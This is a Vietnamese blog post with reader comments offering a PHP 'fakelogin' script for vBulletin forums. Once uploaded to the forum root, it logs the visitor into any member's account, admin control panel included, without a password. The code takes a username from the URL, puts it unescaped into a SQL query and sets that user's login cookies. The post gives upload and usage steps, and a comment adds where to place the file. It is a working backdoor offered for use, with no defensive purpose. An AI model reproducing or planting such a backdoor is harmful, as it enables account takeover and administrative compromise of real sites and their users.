Chia sẻ thông tin

KenjiVN - Quốc Trưởng

Search This Blog

Chủ Nhật, 10 tháng 6, 2012

Fakelogin - Đăng nhập vào forum VBB không cần pass

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


Quote:
<?php
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}

?>

Copy đoạn code trên vào notepad save đuôi *.php

Upload vào thư mục chứa forum ngang hàng với file index.php

Sau đó chạy link sau

http://domain.com/forum/*.php?bd=username

2 nhận xét:

  1. thư mục chứa forum ngang hàng với file index.php là file nào bạn

    Trả lờiXóa
  2. @ Huynh Chi Cong: nếu 4rum của bạn dạng: domain.com thì bạn up vào public_html
    Nếu 4rum của bạn dạng: domain.com/forum thì bạn up lên public_html/forum đó :D

    Trả lờiXóa